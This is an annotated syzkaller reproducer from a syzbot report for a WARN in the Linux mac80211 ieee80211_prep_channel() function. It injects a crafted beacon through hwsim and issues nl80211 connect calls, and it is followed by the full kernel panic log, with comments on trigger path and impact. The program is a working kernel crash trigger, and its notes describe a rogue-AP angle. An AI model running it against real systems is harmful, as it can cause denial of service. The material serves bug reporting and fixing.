# syzkaller reproducer from a syzbot report: WARNING at net/mac80211/mlme.c:1124 in
# ieee80211_prep_channel() on 6.15.0-rc2-syzkaller (x86_64 QEMU guest, mac80211_hwsim).
#
# Trigger path, read off the stack trace that follows the program: a sendmsg() on an
# nl80211 generic-netlink socket (ORIG_RAX 0x2e) -> nl80211_connect -> cfg80211_connect
# -> cfg80211_conn_do_work -> cfg80211_mlme_auth -> ieee80211_mgd_auth ->
# ieee80211_prep_connection -> ieee80211_prep_channel, where the WARN fires.  The BSS the
# connect resolves to (cfg80211_connect calls __cfg80211_get_bss in the trace) is, as far
# as this program shows, the one advertised by the beacon injected into hwsim below, so
# the IEs mac80211 evaluates while preparing the channel are attacker-controlled; over
# the air they would come from a rogue AP.
#
# Impact visible in this log: a WARN, turned into a full panic only because the test
# kernel runs with panic_on_warn ("Kernel panic - not syncing: kernel: panic_on_warn
# set").  The build is KASAN-instrumented (kasan_save_track / __asan_memset appear in the
# trace) and no KASAN report is emitted, so nothing here indicates memory corruption;
# until the condition at mlme.c:1124 is inspected, treat it as a DoS on panic_on_warn
# kernels and a log splat elsewhere.  NOTE(review): the reproducer ran as UID 0 (see the
# "CPU:" line), and NL80211_CMD_CONNECT is ordinarily an admin (CAP_NET_ADMIN) command --
# confirm whether it is reachable from an unprivileged user namespace on the target
# config before rating this as an unprivileged DoS.
#
# Listing caveat: r8 (the wlan1 ifindex) is used by the last two sendmsg calls but is
# never bound in this listing; the `<r8=>` result marker on the SIOCGIFINDEX call has
# apparently been stripped (it looks like an HTML tag), so fetch the raw reproducer from
# syzbot rather than copying this text.
program:
# Calls that do not appear in the trace; presumably fuzzer noise, but confirm by
# minimizing.  SET_REG is the one to keep an eye on: it changes the regulatory domain
# that later channel checks (cfg80211_get_end_freq in the trace) consult.
r0 = bpf$MAP_CREATE(0x0, &(0x7f0000000080)=@base={0x2, 0x4, 0x6, 0x504, 0x0, 0xffffffffffffffff, 0x0, '\x00', 0x0, 0xffffffffffffffff, 0x0, 0x0, 0x0, 0x0, @void, @value, @void, @value}, 0x48)
bpf$MAP_LOOKUP_BATCH(0x18, &(0x7f00000003c0)={0x0, 0x0, &(0x7f0000000000), &(0x7f0000000200), 0xa7c, r0}, 0x38)
r1 = getpid()
r2 = socket$nl_generic(0x10, 0x3, 0x10)
# Raw generic-netlink message to a hard-coded family id; not decoded here.
sendmsg$nl_generic(r2, &(0x7f0000000180)={0x0, 0x0, &(0x7f0000000200)={&(0x7f0000000300)=ANY=[@ANYBLOB="18000000240001030000000000000000010000000400ae"], 0x18}, 0x1, 0x0, 0x0, 0x8001}, 0x4000)
# Sent on fd -1, so this START_AP fails (EBADF) and has no effect.
sendmsg$NL80211_CMD_START_AP(0xffffffffffffffff, &(0x7f00000001c0)={0x0, 0x0, &(0x7f0000000200)={&(0x7f0000000280)=ANY=[@ANYBLOB='00'], 0x30}, 0x1, 0x0, 0x0, 0x18004}, 0x0)
r3 = syz_genetlink_get_family_id$nl80211(&(0x7f0000000100), 0xffffffffffffffff)
r4 = socket$nl_generic(0x10, 0x3, 0x10)
sendmsg$NL80211_CMD_SET_REG(r4, &(0x7f0000000500)={0x0, 0x0, &(0x7f00000004c0)={&(0x7f0000000240)=ANY=[@ANYBLOB='D\x00\x00\x00', @ANYRES16=r3, @ANYBLOB="010000000000800000001a000000280022800414008004000080040000808341f1680200008014000080040000800400008004000080060021"], 0x44}}, 0x0)
recvmmsg(r2, &(0x7f00000086c0)=[{{0x0, 0x0, 0x0}, 0x101}], 0x1, 0x20, 0x0)
r5 = syz_pidfd_open(r1, 0x0)
process_mrelease(r5, 0x0)
# Attacker-controlled input: a crafted 802.11 beacon (frame control 0x0080) injected
# through hwsim device b.  Its SSID IE is 6 bytes of 0x02, the same length as the
# NL80211_ATTR_SSID sent by the CONNECT below (presumably the same bytes).  Its
# Supported Rates IE (`01 01 0b`) holds a single rate with the basic-rate bit clear,
# which matches the "wlan1: No basic rates, using min rate instead" line the kernel
# logs right before the WARN.  The trailing elements appear truncated.
syz_80211_inject_frame(&(0x7f0000000240)=@device_b, &(0x7f0000000280)=ANY=[@ANYBLOB="80000000080211000001080211000000aa09b799c0d70000000000000000000064000110000602020202020201010b04060280faff89f33c00005b"], 0xb5)
# The trigger: put wlan1 into station mode and connect by SSID.
r6 = socket$nl_generic(0x10, 0x3, 0x10)
r7 = syz_genetlink_get_family_id$nl80211(&(0x7f0000000080), 0xffffffffffffffff)
# Resolves the ifindex of wlan1 (this is where r8 should be bound; see the caveat above).
ioctl$sock_SIOCGIFINDEX_80211(r6, 0x8933, &(0x7f00000000c0)={'wlan1\x00', 0x0})
# NL80211_ATTR_IFINDEX (type 3) = r8, NL80211_ATTR_IFTYPE (type 5) = 2 (station).
sendmsg$NL80211_CMD_SET_INTERFACE(r6, &(0x7f0000000100)={0x0, 0x0, &(0x7f0000000140)={&(0x7f0000000180)={0x24, r7, 0x5, 0x0, 0x0, {{}, {@val={0x8, 0x3, r8}, @void}}, [@NL80211_ATTR_IFTYPE={0x8, 0x5, 0x2}]}, 0x24}}, 0x0)
# NL80211_ATTR_IFINDEX = r8, NL80211_ATTR_SSID (type 0x34) = the 6-byte default AP SSID;
# no BSSID attribute is given, so cfg80211 picks the BSS itself.  This sendmsg is the
# one on the stack when the WARN fires.
sendmsg$NL80211_CMD_CONNECT(r6, &(0x7f00000001c0)={0x0, 0x0, &(0x7f0000000200)={&(0x7f0000000a00)={0x28, r7, 0x5, 0x0, 0x0, {{}, {@val={0x8, 0x3, r8}, @void}}, [@NL80211_ATTR_SSID={0xa, 0x34, @default_ap_ssid}]}, 0x28}}, 0x0)
[ 69.161137][ T5308] Bluetooth: hci0: command tx timeout [ 69.221621][ T5323] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 69.249686][ T5323] wlan1: No basic rates, using min rate instead [ 69.253195][ T5323] ------------[ cut here ]------------ [ 69.256182][ T5323] WARNING: CPU: 0 PID: 5323 at net/mac80211/mlme.c:1124 ieee80211_prep_channel+0x4e32/0x66e0 [ 69.261019][ T5323] Modules linked in: [ 69.262780][ T5323] CPU: 0 UID: 0 PID: 5323 Comm: syz.0.0 Not tainted 6.15.0-rc2-syzkaller-00048-gc62f4b82d571 #0 PREEMPT(full) [ 69.268017][ T5323] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 [ 69.272568][ T5323] RIP: 0010:ieee80211_prep_channel+0x4e32/0x66e0 [ 69.275509][ T5323] Code: c6 05 d2 3d 92 04 01 48 c7 c7 37 3f 6d 8d be e8 03 00 00 48 c7 c2 a0 40 6d 8d e8 79 95 e7 f5 e9 03 b5 ff ff e8 6f ce 0b f6 90 <0f> 0b 90 48 8b 7c 24 28 e8 f1 64 6a f6 48 c7 44 24 28 ea ff ff ff [ 69.283644][ T5323] RSP: 0018:ffffc9000d41e440 EFLAGS: 00010283 [ 69.286393][ T5323] RAX: ffffffff8bb786c1 RBX: 0000000000000000 RCX: 0000000000100000 [ 69.289724][ T5323] RDX: ffffc9000e4da000 RSI: 0000000000000966 RDI: 0000000000000967 [ 69.293062][ T5323] RBP: ffffc9000d41e850 R08: ffffffff8bb74707 R09: ffffffff8b85b52c [ 69.296505][ T5323] R10: 000000000000000e R11: ffff88801f774880 R12: dffffc0000000000 [ 69.300035][ T5323] R13: ffff88805344e758 R14: ffffc9000d41e710 R15: ffffc9000d41e750 [ 69.303300][ T5323] FS: 00007f02372626c0(0000) GS:ffff88808c593000(0000) knlGS:0000000000000000 [ 69.306980][ T5323] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 69.309540][ T5323] CR2: 00007f0236583170 CR3: 000000003684e000 CR4: 0000000000352ef0 [ 69.312756][ T5323] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 69.316236][ 
T5323] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 69.319299][ T5323] Call Trace: [ 69.320621][ T5323] [ 69.321794][ T5323] ? tick_nohz_tick_stopped+0x82/0xb0 [ 69.323967][ T5323] ? ieee80211_prep_channel+0x223/0x66e0 [ 69.326364][ T5323] ? __wake_up_klogd+0xd5/0x110 [ 69.328486][ T5323] ? vprintk_emit+0x81f/0xa40 [ 69.330550][ T5323] ? __pfx_vprintk_emit+0x10/0x10 [ 69.332803][ T5323] ? __pfx_ieee80211_prep_channel+0x10/0x10 [ 69.335379][ T5323] ? ieee80211_mgd_setup_link_sta+0x600/0xb10 [ 69.338024][ T5323] ? __pfx__printk+0x10/0x10 [ 69.340009][ T5323] ? __pfx_ieee80211_mgd_setup_link_sta+0x10/0x10 [ 69.342771][ T5323] ? ieee80211_prep_connection+0x55d/0x1310 [ 69.345372][ T5323] ieee80211_prep_connection+0xda7/0x1310 [ 69.347815][ T5323] ieee80211_mgd_auth+0xf04/0x1770 [ 69.350075][ T5323] ? __lock_acquire+0xad5/0xd80 [ 69.352237][ T5323] ? __pfx_ieee80211_mgd_auth+0x10/0x10 [ 69.354650][ T5323] cfg80211_mlme_auth+0x59f/0x970 [ 69.357092][ T5323] cfg80211_conn_do_work+0x637/0xed0 [ 69.359241][ T5323] ? __pfx_cfg80211_conn_do_work+0x10/0x10 [ 69.361634][ T5323] ? _raw_spin_unlock_irqrestore+0x90/0x140 [ 69.364041][ T5323] ? lockdep_hardirqs_on+0x9d/0x150 [ 69.366261][ T5323] ? rcu_is_watching+0x15/0xb0 [ 69.368225][ T5323] ? trace_cfg80211_return_bss+0x87/0x210 [ 69.370472][ T5323] ? __cfg80211_get_bss+0x613/0x7d0 [ 69.372563][ T5323] ? cfg80211_connect+0x16cc/0x20e0 [ 69.374728][ T5323] cfg80211_connect+0x1758/0x20e0 [ 69.377055][ T5323] ? __lock_acquire+0xad5/0xd80 [ 69.379055][ T5323] ? reacquire_held_locks+0x12a/0x1e0 [ 69.381313][ T5323] ? __pfx_cfg80211_connect+0x10/0x10 [ 69.383621][ T5323] ? __asan_memset+0x23/0x50 [ 69.385647][ T5323] ? nl80211_crypto_settings+0xb6d/0xf10 [ 69.388015][ T5323] nl80211_connect+0x1d57/0x24b0 [ 69.390090][ T5323] ? __pfx_nl80211_connect+0x10/0x10 [ 69.392372][ T5323] ? trace_contention_end+0x3c/0x120 [ 69.394617][ T5323] genl_rcv_msg+0xb38/0xf00 [ 69.396564][ T5323] ? 
__pfx_genl_rcv_msg+0x10/0x10 [ 69.398505][ T5323] ? __dev_queue_xmit+0x1780/0x3f60 [ 69.400606][ T5323] ? kasan_save_track+0x3f/0x80 [ 69.402790][ T5323] ? __kasan_slab_alloc+0x66/0x80 [ 69.405047][ T5323] ? do_syscall_64+0xf3/0x230 [ 69.406977][ T5323] ? __lock_acquire+0xad5/0xd80 [ 69.408920][ T5323] ? __pfx_nl80211_pre_doit+0x10/0x10 [ 69.411221][ T5323] ? __pfx_nl80211_connect+0x10/0x10 [ 69.413401][ T5323] ? __pfx_nl80211_post_doit+0x10/0x10 [ 69.415919][ T5323] netlink_rcv_skb+0x208/0x480 [ 69.417978][ T5323] ? __pfx_genl_rcv_msg+0x10/0x10 [ 69.420164][ T5323] ? __pfx_netlink_rcv_skb+0x10/0x10 [ 69.422300][ T5323] ? netlink_deliver_tap+0x2e/0x1b0 [ 69.424603][ T5323] genl_rcv+0x28/0x40 [ 69.426549][ T5323] netlink_unicast+0x7f8/0x9a0 [ 69.428680][ T5323] ? __pfx_netlink_unicast+0x10/0x10 [ 69.430964][ T5323] ? skb_put+0x114/0x1f0 [ 69.432813][ T5323] netlink_sendmsg+0x8c3/0xcd0 [ 69.435149][ T5323] ? __pfx_netlink_sendmsg+0x10/0x10 [ 69.437521][ T5323] ? aa_sock_msg_perm+0x91/0x160 [ 69.439743][ T5323] ? __pfx_netlink_sendmsg+0x10/0x10 [ 69.442159][ T5323] __sock_sendmsg+0x221/0x270 [ 69.444359][ T5323] ____sys_sendmsg+0x523/0x860 [ 69.446670][ T5323] ? __pfx_____sys_sendmsg+0x10/0x10 [ 69.448923][ T5323] ? __fget_files+0x2a/0x420 [ 69.450977][ T5323] ? __fget_files+0x2a/0x420 [ 69.453060][ T5323] __sys_sendmsg+0x271/0x360 [ 69.455336][ T5323] ? __lock_acquire+0xad5/0xd80 [ 69.457328][ T5323] ? __pfx___sys_sendmsg+0x10/0x10 [ 69.459586][ T5323] ? do_syscall_64+0xb6/0x230 [ 69.461560][ T5323] do_syscall_64+0xf3/0x230 [ 69.463544][ T5323] ? 
clear_bhb_loop+0x45/0xa0 [ 69.465649][ T5323] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 69.468190][ T5323] RIP: 0033:0x7f023638e169 [ 69.470242][ T5323] Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 [ 69.478399][ T5323] RSP: 002b:00007f0237262038 EFLAGS: 00000246 ORIG_RAX: 000000000000002e [ 69.481877][ T5323] RAX: ffffffffffffffda RBX: 00007f02365b5fa0 RCX: 00007f023638e169 [ 69.485317][ T5323] RDX: 0000000000000000 RSI: 00002000000001c0 RDI: 0000000000000007 [ 69.489018][ T5323] RBP: 00007f0236410a68 R08: 0000000000000000 R09: 0000000000000000 [ 69.492388][ T5323] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 [ 69.495740][ T5323] R13: 0000000000000000 R14: 00007f02365b5fa0 R15: 00007ffd1a3f4b28 [ 69.499222][ T5323] [ 69.500721][ T5323] Kernel panic - not syncing: kernel: panic_on_warn set ... [ 69.503895][ T5323] CPU: 0 UID: 0 PID: 5323 Comm: syz.0.0 Not tainted 6.15.0-rc2-syzkaller-00048-gc62f4b82d571 #0 PREEMPT(full) [ 69.508799][ T5323] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 [ 69.513571][ T5323] Call Trace: [ 69.514970][ T5323] [ 69.516470][ T5323] dump_stack_lvl+0x241/0x360 [ 69.518421][ T5323] ? __pfx_dump_stack_lvl+0x10/0x10 [ 69.520518][ T5323] ? __pfx__printk+0x10/0x10 [ 69.522300][ T5323] ? vscnprintf+0x5d/0x90 [ 69.523989][ T5323] panic+0x349/0x880 [ 69.525487][ T5323] ? __warn+0x174/0x4d0 [ 69.527066][ T5323] ? __pfx_panic+0x10/0x10 [ 69.528718][ T5323] __warn+0x344/0x4d0 [ 69.530220][ T5323] ? ieee80211_prep_channel+0x4e32/0x66e0 [ 69.532279][ T5323] report_bug+0x2b3/0x500 [ 69.533934][ T5323] ? ieee80211_prep_channel+0x4e32/0x66e0 [ 69.536194][ T5323] ? ieee80211_prep_channel+0x4e32/0x66e0 [ 69.538446][ T5323] ? 
ieee80211_prep_channel+0x4e34/0x66e0 [ 69.540650][ T5323] handle_bug+0x89/0x170 [ 69.542404][ T5323] exc_invalid_op+0x1a/0x50 [ 69.544271][ T5323] asm_exc_invalid_op+0x1a/0x20 [ 69.546324][ T5323] RIP: 0010:ieee80211_prep_channel+0x4e32/0x66e0 [ 69.548864][ T5323] Code: c6 05 d2 3d 92 04 01 48 c7 c7 37 3f 6d 8d be e8 03 00 00 48 c7 c2 a0 40 6d 8d e8 79 95 e7 f5 e9 03 b5 ff ff e8 6f ce 0b f6 90 <0f> 0b 90 48 8b 7c 24 28 e8 f1 64 6a f6 48 c7 44 24 28 ea ff ff ff [ 69.556466][ T5323] RSP: 0018:ffffc9000d41e440 EFLAGS: 00010283 [ 69.559062][ T5323] RAX: ffffffff8bb786c1 RBX: 0000000000000000 RCX: 0000000000100000 [ 69.562304][ T5323] RDX: ffffc9000e4da000 RSI: 0000000000000966 RDI: 0000000000000967 [ 69.565689][ T5323] RBP: ffffc9000d41e850 R08: ffffffff8bb74707 R09: ffffffff8b85b52c [ 69.568724][ T5323] R10: 000000000000000e R11: ffff88801f774880 R12: dffffc0000000000 [ 69.571757][ T5323] R13: ffff88805344e758 R14: ffffc9000d41e710 R15: ffffc9000d41e750 [ 69.574921][ T5323] ? cfg80211_get_end_freq+0x7c/0x1d0 [ 69.577206][ T5323] ? ieee80211_prep_channel+0xe77/0x66e0 [ 69.579549][ T5323] ? ieee80211_prep_channel+0x4e31/0x66e0 [ 69.581831][ T5323] ? tick_nohz_tick_stopped+0x82/0xb0 [ 69.584038][ T5323] ? ieee80211_prep_channel+0x223/0x66e0 [ 69.586390][ T5323] ? __wake_up_klogd+0xd5/0x110 [ 69.588435][ T5323] ? vprintk_emit+0x81f/0xa40 [ 69.590393][ T5323] ? __pfx_vprintk_emit+0x10/0x10 [ 69.592433][ T5323] ? __pfx_ieee80211_prep_channel+0x10/0x10 [ 69.594892][ T5323] ? ieee80211_mgd_setup_link_sta+0x600/0xb10 [ 69.597554][ T5323] ? __pfx__printk+0x10/0x10 [ 69.599493][ T5323] ? __pfx_ieee80211_mgd_setup_link_sta+0x10/0x10 [ 69.602138][ T5323] ? ieee80211_prep_connection+0x55d/0x1310 [ 69.604661][ T5323] ieee80211_prep_connection+0xda7/0x1310 [ 69.607180][ T5323] ieee80211_mgd_auth+0xf04/0x1770 [ 69.609320][ T5323] ? __lock_acquire+0xad5/0xd80 [ 69.611336][ T5323] ? 
__pfx_ieee80211_mgd_auth+0x10/0x10 [ 69.613612][ T5323] cfg80211_mlme_auth+0x59f/0x970 [ 69.615709][ T5323] cfg80211_conn_do_work+0x637/0xed0 [ 69.617994][ T5323] ? __pfx_cfg80211_conn_do_work+0x10/0x10 [ 69.620305][ T5323] ? _raw_spin_unlock_irqrestore+0x90/0x140 [ 69.622463][ T5323] ? lockdep_hardirqs_on+0x9d/0x150 [ 69.624444][ T5323] ? rcu_is_watching+0x15/0xb0 [ 69.626378][ T5323] ? trace_cfg80211_return_bss+0x87/0x210 [ 69.628605][ T5323] ? __cfg80211_get_bss+0x613/0x7d0 [ 69.630666][ T5323] ? cfg80211_connect+0x16cc/0x20e0 [ 69.632761][ T5323] cfg80211_connect+0x1758/0x20e0 [ 69.634962][ T5323] ? __lock_acquire+0xad5/0xd80 [ 69.637034][ T5323] ? reacquire_held_locks+0x12a/0x1e0 [ 69.639167][ T5323] ? __pfx_cfg80211_connect+0x10/0x10 [ 69.641303][ T5323] ? __asan_memset+0x23/0x50 [ 69.643183][ T5323] ? nl80211_crypto_settings+0xb6d/0xf10 [ 69.645387][ T5323] nl80211_connect+0x1d57/0x24b0 [ 69.647422][ T5323] ? __pfx_nl80211_connect+0x10/0x10 [ 69.649501][ T5323] ? trace_contention_end+0x3c/0x120 [ 69.651634][ T5323] genl_rcv_msg+0xb38/0xf00 [ 69.653460][ T5323] ? __pfx_genl_rcv_msg+0x10/0x10 [ 69.655339][ T5323] ? __dev_queue_xmit+0x1780/0x3f60 [ 69.657265][ T5323] ? kasan_save_track+0x3f/0x80 [ 69.659017][ T5323] ? __kasan_slab_alloc+0x66/0x80 [ 69.660804][ T5323] ? do_syscall_64+0xf3/0x230 [ 69.662478][ T5323] ? __lock_acquire+0xad5/0xd80 [ 69.664295][ T5323] ? __pfx_nl80211_pre_doit+0x10/0x10 [ 69.666293][ T5323] ? __pfx_nl80211_connect+0x10/0x10 [ 69.668206][ T5323] ? __pfx_nl80211_post_doit+0x10/0x10 [ 69.670328][ T5323] netlink_rcv_skb+0x208/0x480 [ 69.672160][ T5323] ? __pfx_genl_rcv_msg+0x10/0x10 [ 69.674128][ T5323] ? __pfx_netlink_rcv_skb+0x10/0x10 [ 69.676329][ T5323] ? netlink_deliver_tap+0x2e/0x1b0 [ 69.678403][ T5323] genl_rcv+0x28/0x40 [ 69.680037][ T5323] netlink_unicast+0x7f8/0x9a0 [ 69.681935][ T5323] ? __pfx_netlink_unicast+0x10/0x10 [ 69.683968][ T5323] ? 
skb_put+0x114/0x1f0 [ 69.685718][ T5323] netlink_sendmsg+0x8c3/0xcd0 [ 69.687688][ T5323] ? __pfx_netlink_sendmsg+0x10/0x10 [ 69.689781][ T5323] ? aa_sock_msg_perm+0x91/0x160 [ 69.691682][ T5323] ? __pfx_netlink_sendmsg+0x10/0x10 [ 69.693820][ T5323] __sock_sendmsg+0x221/0x270 [ 69.695718][ T5323] ____sys_sendmsg+0x523/0x860 [ 69.697738][ T5323] ? __pfx_____sys_sendmsg+0x10/0x10 [ 69.699862][ T5323] ? __fget_files+0x2a/0x420 [ 69.701752][ T5323] ? __fget_files+0x2a/0x420 [ 69.703614][ T5323] __sys_sendmsg+0x271/0x360 [ 69.705441][ T5323] ? __lock_acquire+0xad5/0xd80 [ 69.707414][ T5323] ? __pfx___sys_sendmsg+0x10/0x10 [ 69.709461][ T5323] ? do_syscall_64+0xb6/0x230 [ 69.711386][ T5323] do_syscall_64+0xf3/0x230 [ 69.713239][ T5323] ? clear_bhb_loop+0x45/0xa0 [ 69.715078][ T5323] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 69.717238][ T5323] RIP: 0033:0x7f023638e169 [ 69.718913][ T5323] Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 [ 69.725853][ T5323] RSP: 002b:00007f0237262038 EFLAGS: 00000246 ORIG_RAX: 000000000000002e [ 69.729104][ T5323] RAX: ffffffffffffffda RBX: 00007f02365b5fa0 RCX: 00007f023638e169 [ 69.732174][ T5323] RDX: 0000000000000000 RSI: 00002000000001c0 RDI: 0000000000000007 [ 69.735359][ T5323] RBP: 00007f0236410a68 R08: 0000000000000000 R09: 0000000000000000 [ 69.738475][ T5323] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 [ 69.741661][ T5323] R13: 0000000000000000 R14: 00007f02365b5fa0 R15: 00007ffd1a3f4b28 [ 69.744809][ T5323] [ 69.746344][ T5323] Kernel Offset: disabled [ 69.748118][ T5323] Rebooting in 86400 seconds..